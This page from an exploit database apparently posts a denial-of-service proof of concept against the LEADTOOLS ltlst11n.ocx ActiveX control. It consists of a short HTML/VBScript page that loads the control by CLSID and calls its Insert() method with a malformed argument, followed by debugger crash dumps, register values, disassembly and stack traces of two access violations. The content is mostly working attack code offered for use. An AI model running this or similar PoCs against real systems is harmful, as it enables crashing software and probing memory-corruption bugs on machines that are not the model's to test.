[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

LEADTOOLS v11.5.0.9 ltlst11n.ocx Insert() Access Violation

Author
Matthew Bergin
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14756
Category
dos / poc
Date add
06-11-2010
Platform
windows
==========================================================
LEADTOOLS v11.5.0.9 ltlst11n.ocx Insert() Access Violation
==========================================================

<html>
Test Exploit Page
 
<object classid='clsid:00110100-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Rational\common\ltlst11n.ocx"
prototype  = "Function Insert ( ByVal Bitmap As Long ,  ByVal pszText As String ,  ByVal Data As Long ) As Integer"
memberName = "Insert"
progid     = "LEADImgListLib.LEADImgList"
argCount   = 3
 
arg1=1
arg2="defaultV"
arg3=-2147483647
 
target.Insert arg1 ,arg2 ,arg3
 
</script>
 
Exception Code: ACCESS_VIOLATION
Disasm: 7C809EDA    MOV AL,[EDX]
 
Seh Chain:
--------------------------------------------------
1   7C839AD8    KERNEL32.dll
2   7C839AD8    KERNEL32.dll
3   73352960    VBSCRIPT.dll
4   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
KERNEL32.7C809EDA             KERNEL32.7C834E80            
KERNEL32.7C834E80             ltlst11n.AA1104              
ltlst11n.AA1104               OLEAUT32.77135CD9            
OLEAUT32.77135CD9             OLEAUT32.771362E8            
OLEAUT32.771362E8             ltlst11n.AAAAB2              
ltlst11n.AAAAB2               ltlst11n.AA45C5              
ltlst11n.AA45C5               VBSCRIPT.73303EB7            
VBSCRIPT.73303EB7             VBSCRIPT.73303E27            
VBSCRIPT.73303E27             VBSCRIPT.73303397            
VBSCRIPT.73303397             VBSCRIPT.73303D88            
VBSCRIPT.73303D88             VBSCRIPT.7330409F            
VBSCRIPT.7330409F             VBSCRIPT.733063EE            
VBSCRIPT.733063EE             VBSCRIPT.73306373            
VBSCRIPT.73306373             VBSCRIPT.73306BA5            
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D            
VBSCRIPT.73306D9D             VBSCRIPT.73305103            
VBSCRIPT.73305103             SCROBJ.5CE44396              
SCROBJ.5CE44396               SCROBJ.5CE4480B              
SCROBJ.5CE4480B               SCROBJ.5CE446A6              
SCROBJ.5CE446A6               SCROBJ.5CE44643              
SCROBJ.5CE44643               SCROBJ.5CE44608              
SCROBJ.5CE44608               1013C93                      
1013C93                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 7C809EDA
EAX 00000001
EBX 00000001
ECX 02650B60 -> 00AB7948
EDX 00000001
EDI 00000001
ESI 00001000
EBP 0013ED20 -> 0013ED60
ESP 0013ECF4 -> 00000000
 
 
Block Disassembly:
--------------------------------------------------
7C809EC2    TEST EDX,EDX
7C809EC4    JE 7C80BFD0
7C809ECA    LEA EDI,[EDX+EAX-1]
7C809ECE    CMP EDI,EDX
7C809ED0    JB 7C80BFD0
7C809ED6    AND DWORD PTR [EBP-4],0
7C809EDA    MOV AL,[EDX]      <--- CRASH
7C809EDC    LEA EAX,[ESI-1]
7C809EDF    NOT EAX
7C809EE1    MOV ECX,EAX
7C809EE3    AND ECX,EDX
7C809EE5    MOV [EBP-1C],ECX
7C809EE8    AND EAX,EDI
7C809EEA    MOV [EBP-20],EAX
7C809EED    CMP ECX,EAX
 
 
ArgDump:
--------------------------------------------------
EBP+8   00000001
EBP+12  00000001
EBP+16  00000000
EBP+20  02650BC0 -> 00AB77F0
EBP+24  00000000
EBP+28  0013EDB4 -> 00181884
 
 
Stack Dump:
--------------------------------------------------
13ECF4 00 00 00 00 C0 0B 65 02 01 00 00 00 02 00 00 00  [......e.........]
13ED04 03 00 00 00 F4 EC 13 00 D0 97 53 00 50 ED 13 00  [..........S.P...]
13ED14 D8 9A 83 7C 08 9F 80 7C 00 00 00 00 60 ED 13 00  [............`...]
13ED24 80 4E 83 7C 01 00 00 00 01 00 00 00 00 00 00 00  [.N..............]
13ED34 C0 0B 65 02 00 00 00 00 B4 ED 13 00 A0 ED 13 00  [..e.............]
 
 
 
Exception Code: ACCESS_VIOLATION
Disasm: AA110A  CMP DWORD PTR [EAX],6461656C
 
Seh Chain:
--------------------------------------------------
1   73352960    VBSCRIPT.dll
2   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
ltlst11n.AA110A               OLEAUT32.77135CD9            
OLEAUT32.77135CD9             OLEAUT32.771362E8            
OLEAUT32.771362E8             ltlst11n.AAAAB2              
ltlst11n.AAAAB2               ltlst11n.AA45C5              
ltlst11n.AA45C5               VBSCRIPT.73303EB7            
VBSCRIPT.73303EB7             VBSCRIPT.73303E27            
VBSCRIPT.73303E27             VBSCRIPT.73303397            
VBSCRIPT.73303397             VBSCRIPT.73303D88            
VBSCRIPT.73303D88             VBSCRIPT.7330409F            
VBSCRIPT.7330409F             VBSCRIPT.733063EE            
VBSCRIPT.733063EE             VBSCRIPT.73306373            
VBSCRIPT.73306373             VBSCRIPT.73306BA5            
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D            
VBSCRIPT.73306D9D             VBSCRIPT.73305103            
VBSCRIPT.73305103             SCROBJ.5CE44396              
SCROBJ.5CE44396               SCROBJ.5CE4480B              
SCROBJ.5CE4480B               SCROBJ.5CE446A6              
SCROBJ.5CE446A6               SCROBJ.5CE44643              
SCROBJ.5CE44643               SCROBJ.5CE44608              
SCROBJ.5CE44608               1013C93                      
1013C93                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 00AA110A
EAX 00000000
EBX 00000000
ECX 0013EDA0 -> 00000000
EDX 00000000
EDI 00000000
ESI 02650BC0 -> 00AB77F0
EBP 0013EDA4 -> 0013EDCC
ESP 0013ED6C -> 00AA8B02
 
 
Block Disassembly:
--------------------------------------------------
AA10F6  LEAVE
AA10F7  RETN 8
AA10FA  PUSH DWORD PTR [ESP+4]
AA10FE  CALL [AB7164]
AA1104  MOV ECX,[ESP+8]
AA1108  MOV [ECX],EAX
AA110A  CMP DWORD PTR [EAX],6461656C      <--- CRASH
AA1110  JE SHORT 00AA1117
AA1112  AND DWORD PTR [ECX],0
AA1115  JMP SHORT 00AA111A
AA1117  MOV EAX,[EAX+8]
AA111A  RETN 8
AA111D  PUSH EBP
AA111E  MOV EBP,ESP
AA1120  SUB ESP,20
 
 
ArgDump:
--------------------------------------------------
EBP+8   02650BC0 -> 00AB77F0
EBP+12  00000001
EBP+16  00181884 -> Uni: defaultV
EBP+20  80000001
EBP+24  0013EE10 -> 00000000
EBP+28  0013EE00 -> 00130000
 
 
Stack Dump:
--------------------------------------------------
13ED6C 02 8B AA 00 01 00 00 00 A0 ED 13 00 00 00 00 00  [................]
13ED7C B4 32 18 00 F0 77 AB 00 04 00 00 00 03 00 00 00  [.....w..........]
13ED8C 30 F0 13 00 7C 52 A5 02 00 00 00 00 FF FF FF FF  [.....R..........]
13ED9C 00 00 00 00 00 00 00 00 CC ED 13 00 D9 5C 13 77  [.............\.w]
13EDAC C0 0B 65 02 01 00 00 00 84 18 18 00 01 00 00 80  [..e.............]
 
 
 
ApiLog
--------------------------------------------------
 
***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)



#  0day.today [2024-12-24]  #